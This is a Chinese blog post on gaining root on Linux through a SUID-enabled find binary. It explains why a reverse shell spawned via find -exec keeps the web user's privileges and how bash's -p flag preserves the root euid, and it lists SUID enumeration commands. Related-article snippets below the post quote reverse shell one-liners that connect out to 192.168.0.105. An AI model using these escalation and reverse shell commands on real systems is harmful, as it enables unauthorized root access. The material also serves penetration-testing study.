linux中利用suid中的find进行root提权遇到的坑

最新推荐文章于 2024-05-28 15:45:10 发布
最新推荐文章于 2024-05-28 15:45:10 发布
阅读量2.4k 收藏 12
点赞数 5
文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rlenew/article/details/111873682
版权

在Linux的提权方式中,有一种是根据suid进行提权。

suid特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行

其为文件赋予suid的命令是
chmod + s 文件 或者是 chmod 4755 文件
一般在获得一台Linux服务器的webshell后考虑提权,Linux下的方式多种多样,而这次主要是讲suid提权中遇到的坑。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

这三个命令可以找到正在系统上运行的所有SUID可执行文件。准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。
而今天要说的是find这个执行文件中所遇到的坑来讲解。对于当find具有root权限执行权限的情况下,网上大部分都会教学说,先创建一个文件并赋予这个文件有suid的权限
在这里插入图片描述然后利用find越权执行命令
在这里插入图片描述然而在反弹shell的时候会出现,即使反弹之后的shell权限还是www权限,而不是root权限
在这里插入图片描述
在这里插入图片描述这里坑就在于,利用find的exec执行命令,执行的是以root的权限执行,但在反弹shell之后却是www的低权限。原因在于其id上可以发现
在这里插入图片描述在执行的时候只有euid显示为root的权限,而其他都是www的权限
在这里插入图片描述反弹之后更是全是www的权限

默认情况下 bash 在执行时,如果发现 euid 和 uid 不匹配,会将 euid(即 suid) 强制重置为uid

因此需要用到参数-p,参数-p的时候则不会再覆盖,如
在这里插入图片描述

0x 0101
关注
  • 5
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
操作系统权限提升(十九)之Linux提权-SUID提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1798
SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.命令执行者要对该程序文件拥有执行(x)权限.命令执行者在执行该程序时获得该程序文件属主的身份.
Linux使用suid vim.basic文件实现提权
09-14
然而,SUID权限也可能被恶意利用,例如在提权攻击。本篇文章将重点讨论如何通过SUID的`vim.basic`文件来实现提权。 首先,我们要确保有一个SUID权限的`vim.basic`文件。在Kali Linux系统,我们可以使用`chmod`...
Linux提权SUID提权
CP1024的博客
04-04 3809
Linux提权SUID提权 SUID提权 1. SUID权限只能设置二进制文件 2. 命令执行者要有二进制文件的执行权 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID权限只在程序执行有效 即如果root给一个程序赋予了SUID权限,则普通用户在执行该程序过程,是root权限 cp命令提权 以cp为例,这里给cp添加SUID权限做测试,拥有SUID权限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
find命令提权以及反弹shell复现
qq_40898302的博客
04-21 7876
关于linux系统的find命令提权复现
简谈SUID提权
最新发布
2401_84466336的博客
05-28 988
SUID (Set UID)是Linux的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
反弹shell通过普通用户进行SUID提权
sGanYu
07-18 1249
如果普通账号tom需要修改密码,就要访问/etc/shadow,由于/etc/passwd文件是所有用户都可读的,如果用户的密码太简单或规律比较明显的话,一台普通的计算机就能够很容易地将它破解,因此对安全性要求较高的Linux系统都把加密后的口令字分离出来,单独存放在一个文件,这个文件是/etc/shadow文件,有超级用户才拥有该文件读权限,但是该文件只有root能访问。当tom需要修改密码,passwd程序的所有者为root,tom用户执行passwd程序的过程会暂时获得root权限。...
Linux利用Suid提权实验
qq_45813384的博客
02-20 1045
普通用户在执行特殊的Suid命令的时候(如:find、vim、less、more等),命令会自动申请管理员权限,并以管理员的权限去执行命令,当用户在这种拥有可以再执行命令的命令下(如:vim)执行特殊命令(如:!find 当前目录下的文件 -execbash-i >& /dev/tcp/192.168.0.105/8529 0>&1。bash-i >& /dev/tcp/192.168.0.105/2323 0>&1//反弹shell命令。ln-s-fbash /bin/sh //修改成bash。
suid提权
m0_62207170的博客
02-28 306
suid提权
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1
08-03
这个案例展示了如何寻找和利用SUID程序进行提权。例如,通过`chmod u+s`赋予一个程序SUID权限,然后利用该程序的漏洞执行任意代码,从而获得root权限。 **案例3:Linux提权本地配合内核漏洞演示** 在Mozhe的案例...
Linux常用命令大全(超详细分类版)
07-07
* `find / -perm -u+s`:罗列一个系统所有使用了SUID控制的文件 * `chmod u+s /bin/file1`:设置一个二进制文件的 SUID 位 - 运行该文件的用户也被赋予和所有者同样的权限 * `chmod u-s /bin/file1`:禁用一个二...
安全防护Linux.pdf
09-07
使用`find / -type f -perm -04000 -o -perm -02000 -print`找出root所属的带s位的程序,并通过`chmod a-s program_name`移除不必要的SUID位。 3. **增强LILO密码保护**:在`/etc/lilo.conf`添加口令选项,如`...
Linux权限提升—内核、SUID、脏牛等提权
剁椒鱼头没剁椒的博客
04-02 3107
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞。
深度分析linux提权SUID提权|Find提权|NMAP提权|VIM提权...
qq_60115503的博客
05-07 2815
SUID是Set User ID,SGID是Set Group的意思 SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限,SGID与SUID相似,只是执行程序时获得的是文件属组的权限
Linux笔记 —— 常用命令二(越权执行,查找,查看,管道,软件包管理,ssh免密与文件分发)
一纸春秋的博客
11-02 982
目录越权执行find 查找查看文件管道 |> 和 >>符号> 的含义是覆盖符号>>的含义是追加,把命令1的结果写入到命令2rpmtar文件分发 越权执行 sudo 越权执行 格式: sudo 要执行的命令 这里的sudo实际上是去借root用户的权限执行命令,前提是root用户给这个用户分配了权限 root用户可以用visudo命令修改配置文件进行权限分配,具体的做法是打开一个文件,文件位置是/etc/sudoers 普通用户可以借助 sudo -l 查看当前权限 具体
Suid之find提权靶机渗透实战
PANDA墨森的博客
07-11 1501
这是vulnhub靶机系列文章的第十一篇,本次主要知识点为:drupal漏洞利用suid提权之find命令 靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13229881.html #001 实验环境 攻击机:kali :192.168.136.129 靶机:192.168.136.136 #002 寻找靶机ip Kali下使用netdisco..
Linux suid提权详细总结
2301_76690905的博客
11-11 552
suid(set uid)是linux的一种特殊权限,suid可以让调用者以文件拥有者身份运行该文件,所以利用suid提权的核心就是运行root用户所拥有的suid的文件,那么运行该文件的时候就得获得root用户的身份了。suid特点是用户运行某个程序时,如果该程序有suid权限,程序运行进程的属主不是发起者,而是程序文件所属的属主。linux引入了3个文件来管理用户组:/etc/passwd存放用户信息。/etc/shadow存放用户密码信息。/etc/group存放组信息。
linux系统suid提权
focus on security
05-19 5538
SUID提权 0x01什么是SUIDSUID (Set UID)是Linux的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
网安笔记——提权的各种姿势
qq_64875725的博客
09-13 313
SUID提权的思路就是运行root用户所拥有的SUID的文件,当其他用户运行该文件的时候就得获得root用户的身份。1、使用find命令查看拥有suid权限的文件2、使用exec查看当前用户,text必须是可以找到的文件名,不然会出错,3、然后使用find命令来提权
linux的一些提权方式
shurongyugong的博客
11-29 864
在搭建场景时候,蚁剑上线后发现是www用户,限制好大,修改一些东西使他能够提权。后面还可以往蚁剑上面上传msf木马,然后在这里执行文件,这一msf也用以root用户权限上线了。可以看到此时我们并不是完全的root权限,但是编辑权限是够的,接下来为。接下来可以开通监听,获取反弹shell。查看普通用户没有权限查看的文件。再开一个监听,并重新上传新脚本。铛铛,此时就是root权限了。
linux suid提权
03-16
SUID是一种特殊的权限位,当一个可执行文件被设置了SUID位后,它在执行时就会以文件所有者的权限来执行,而不是以执行者的权限来执行。这种特性可以被滥用来进行提权攻击,即攻击者通过执行一个SUID文件来获取root权限。在Linux系统SUID文件通常是一些系统工具,如passwd、ping等。攻击者可以通过利用这些工具的漏洞来获取root权限。为了防止SUID提权攻击,管理员应该定期检查系统SUID文件,并限制它们的使用权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值